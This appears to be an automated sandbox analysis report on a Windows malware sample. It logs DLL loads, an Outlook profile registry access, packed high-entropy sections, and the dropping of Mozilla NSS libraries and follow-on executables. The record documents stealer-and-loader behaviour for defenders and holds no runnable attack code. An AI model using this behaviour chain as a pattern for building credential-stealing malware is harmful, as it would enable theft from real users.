                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: file.exeStatic file information: File size 2523648 > 1048576
                        Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x224e00
                        Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                        Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ff0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeUnpacked PE file: 8.2.HCGCBFHCFC.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 10.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 11.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeUnpacked PE file: 12.2.a62ee169b8.exe.900000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 15.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 16.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 17.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 18.2.explorti.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wiqvgckm:EW;emtqvjqa:EW;.taggant:EW;
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C9B3480
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .data
                        Source: random[1].exe.10.drStatic PE information: real checksum: 0x0 should be: 0x26c425
                        Source: a62ee169b8.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x26c425
                        Source: explorti.exe.8.drStatic PE information: real checksum: 0x1dcb6e should be: 0x1e158e
                        Source: file.exeStatic PE information: real checksum: 0x0 should be: 0x26c425
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: real checksum: 0x1dcb6e should be: 0x1e158e
                        Source: amadka[1].exe.0.drStatic PE information: real checksum: 0x1dcb6e should be: 0x1e158e
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                        Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                        Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                        Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name:
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name: .idata
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name:
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name: wiqvgckm
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name: emtqvjqa
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name: .taggant
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: wiqvgckm
                        Source: amadka[1].exe.0.drStatic PE information: section name: emtqvjqa
                        Source: amadka[1].exe.0.drStatic PE information: section name: .taggant
                        Source: explorti.exe.8.drStatic PE information: section name:
                        Source: explorti.exe.8.drStatic PE information: section name: .idata
                        Source: explorti.exe.8.drStatic PE information: section name:
                        Source: explorti.exe.8.drStatic PE information: section name: wiqvgckm
                        Source: explorti.exe.8.drStatic PE information: section name: emtqvjqa
                        Source: explorti.exe.8.drStatic PE information: section name: .taggant
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: random[1].exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: a62ee169b8.exe.10.drStatic PE information: section name:
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9EB536 push ecx; ret 0_2_6C9EB549
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DBD82C push ecx; ret 10_2_00DBD83F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F602760 push 7F600002h; ret 12_2_7F60276F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F602460 push 7F600002h; ret 12_2_7F60246F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600960 push 7F600002h; ret 12_2_7F60096F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600C60 push 7F600002h; ret 12_2_7F600C6F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600F60 push 7F600002h; ret 12_2_7F600F6F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601260 push 7F600002h; ret 12_2_7F60126F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601560 push 7F600002h; ret 12_2_7F60156F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601860 push 7F600002h; ret 12_2_7F60186F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601B60 push 7F600002h; ret 12_2_7F601B6F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601E60 push 7F600002h; ret 12_2_7F601E6F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F602160 push 7F600002h; ret 12_2_7F60216F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F602670 push 7F600002h; ret 12_2_7F60267F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F602370 push 7F600002h; ret 12_2_7F60237F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600870 push 7F600002h; ret 12_2_7F60087F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600B70 push 7F600002h; ret 12_2_7F600B7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600E70 push 7F600002h; ret 12_2_7F600E7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601170 push 7F600002h; ret 12_2_7F60117F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601470 push 7F600002h; ret 12_2_7F60147F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601770 push 7F600002h; ret 12_2_7F60177F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601A70 push 7F600002h; ret 12_2_7F601A7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601D70 push 7F600002h; ret 12_2_7F601D7F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F602070 push 7F600002h; ret 12_2_7F60207F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F602640 push 7F600002h; ret 12_2_7F60264F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F602340 push 7F600002h; ret 12_2_7F60234F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600840 push 7F600002h; ret 12_2_7F60084F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600B40 push 7F600002h; ret 12_2_7F600B4F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F600E40 push 7F600002h; ret 12_2_7F600E4F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601140 push 7F600002h; ret 12_2_7F60114F
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F601440 push 7F600002h; ret 12_2_7F60144F
                        Source: file.exeStatic PE information: section name: entropy: 7.995115143685791
                        Source: file.exeStatic PE information: section name: entropy: 7.981632425643477
                        Source: file.exeStatic PE information: section name: entropy: 7.95439535087447
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name: entropy: 7.9816443894743605
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: section name: wiqvgckm entropy: 7.953626217985581
                        Source: amadka[1].exe.0.drStatic PE information: section name: entropy: 7.9816443894743605
                        Source: amadka[1].exe.0.drStatic PE information: section name: wiqvgckm entropy: 7.953626217985581
                        Source: explorti.exe.8.drStatic PE information: section name: entropy: 7.9816443894743605
                        Source: explorti.exe.8.drStatic PE information: section name: wiqvgckm entropy: 7.953626217985581
                        Source: random[1].exe.10.drStatic PE information: section name: entropy: 7.995115143685791
                        Source: random[1].exe.10.drStatic PE information: section name: entropy: 7.981632425643477
                        Source: random[1].exe.10.drStatic PE information: section name: entropy: 7.95439535087447
                        Source: a62ee169b8.exe.10.drStatic PE information: section name: entropy: 7.995115143685791
                        Source: a62ee169b8.exe.10.drStatic PE information: section name: entropy: 7.981632425643477
                        Source: a62ee169b8.exe.10.drStatic PE information: section name: entropy: 7.95439535087447
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile created: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
